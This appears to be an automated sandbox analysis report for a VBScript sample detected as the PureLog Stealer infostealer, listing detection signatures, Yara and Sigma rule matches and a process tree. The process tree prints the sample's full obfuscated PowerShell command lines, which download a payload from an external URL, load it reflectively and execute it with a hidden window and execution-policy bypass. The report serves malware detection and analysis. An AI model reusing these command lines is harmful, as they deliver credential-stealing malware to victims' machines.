Windows
Analysis Report
aK7smea2Vv.vbs
Overview
General Information
Sample name: | aK7smea2Vv.vbs (renamed because the original name is a hash value) |
Original sample name: | 5ae8ef220711cf775ea5b5e8a93db4e2a88829709cf68e1a810f47229fdba903.vbs |
Analysis ID: | 1523831 |
MD5: | 1c640c5256d9b20ca3693754dadea139 |
SHA1: | 025616236d051812117c1b2e482fb715f0e1cc94 |
SHA256: | 5ae8ef220711cf775ea5b5e8a93db4e2a88829709cf68e1a810f47229fdba903 |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7384, cmdline: `C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\aK7smea2Vv.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7472, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEQzcnKyd1cmwgPSBrZicrJ3NodHRwczovL2knKydhNjAwMTAwJysnLnVzJysnLmFyY2hpdmUub3JnLycrJzI0L2l0JysnZW1zL2RldGEnKydoLW5vdGUtJysndi9EZXRhaE4nKydvJysndGVWLnR4dGtmJysncztEQzdiYXNlNjRDb250ZW50ID0gJysnKE5ldy1PYmplY3QgJysnU3lzdGVtLk5lJysndC5XZScrJ2InKydDbGllbnQpLicrJ0Rvd25sb2FkU3RyaW4nKydnKERDN3VybCknKyc7JysnREM3YmluYXJ5Q29udGVudCA9IFtTeXN0JysnZW0nKycuQ29udmVydF06JysnOkZybycrJ21CYXNlNjRTdHJpbmcnKycoREM3YmFzZTY0Q29udGVudCk7REM3YXNzZW1iJysnbHknKycgPSBbUicrJ2VmbGUnKydjdGlvbi5BJysnc3NlbWJsJysneV06OkxvYWQoREM3JysnYmluJysnYXJ5QycrJ29uJysndGVudCknKyc7REM3dHknKydwZScrJyA9IERDN2Fzc2VtYmx5LkdldFR5cGUoa2ZzUicrJ3VuUCcrJ0UnKycuSG9tJysnZWtmcyk7REM3JysnbScrJ2V0aG9kJysnID0nKycgREM3dHlwJysnZScrJy4nKydHZXQnKydNZXQnKydob2QoJysna2ZzVicrJ0EnKydJaycrJ2ZzJysnKTtEQzdtZScrJ3Rob2QnKycuSW52b2tlKERDJysnN251bGwsJysnIFtvYmplY3RbXV1AKGsnKydmc3R4dC4nKydGRFInKydXLzA2NS82JysnNTEuMDkxLicrJzk3LjU0Ly86cHR0aCcrJ2tmcyAsIGtmc2Rlc2F0aXZhZG9rZnMgLCBrZnNkZXNhdGl2JysnYWQnKydvaycrJ2YnKydzJysnICcrJywga2ZzZGVzYXQnKydpJysndmFkbycrJ2tmcyxrZnMnKydSZWdBc21rZnMnKycsa2ZzJysna2ZzKScrJyknKS5yRVBMQUNFKChbY2hBcl02OCtbY2hBcl02NytbY2hBcl01NSksW1NUUklOR11bY2hBcl0zNikuckVQTEFDRSgna2ZzJyxbU1RSSU5HXVtjaEFyXTM5KXwgaUVY';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7480, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7612, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('DC7'+'url = kf'+'shttps://i'+'a600100'+'.us'+'.archive.org/'+'24/it'+'ems/deta'+'h-note-'+'v/DetahN'+'o'+'teV.txtkf'+'s;DC7base64Content = '+'(New-Object '+'System.Ne'+'t.We'+'b'+'Client).'+'DownloadStrin'+'g(DC7url)'+';'+'DC7binaryContent = [Syst'+'em'+'.Convert]:'+':Fro'+'mBase64String'+'(DC7base64Content);DC7assemb'+'ly'+' = [R'+'efle'+'ction.A'+'ssembl'+'y]::Load(DC7'+'bin'+'aryC'+'on'+'tent)'+';DC7ty'+'pe'+' = DC7assembly.GetType(kfsR'+'unP'+'E'+'.Hom'+'ekfs);DC7'+'m'+'ethod'+' ='+' DC7typ'+'e'+'.'+'Get'+'Met'+'hod('+'kfsV'+'A'+'Ik'+'fs'+');DC7me'+'thod'+'.Invoke(DC'+'7null,'+' [object[]]@(k'+'fstxt.'+'FDR'+'W/065/6'+'51.091.'+'97.54//:ptth'+'kfs , kfsdesativadokfs , kfsdesativ'+'ad'+'ok'+'f'+'s'+' '+', kfsdesat'+'i'+'vado'+'kfs,kfs'+'RegAsmkfs'+',kfs'+'kfs)'+')').rEPLACE(([chAr]68+[chAr]67+[chAr]55),[STRING][chAr]36).rEPLACE('kfs',[STRING][chAr]39)| iEX"`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary
---
Source: | Author: Florian Roth (Nextron Systems)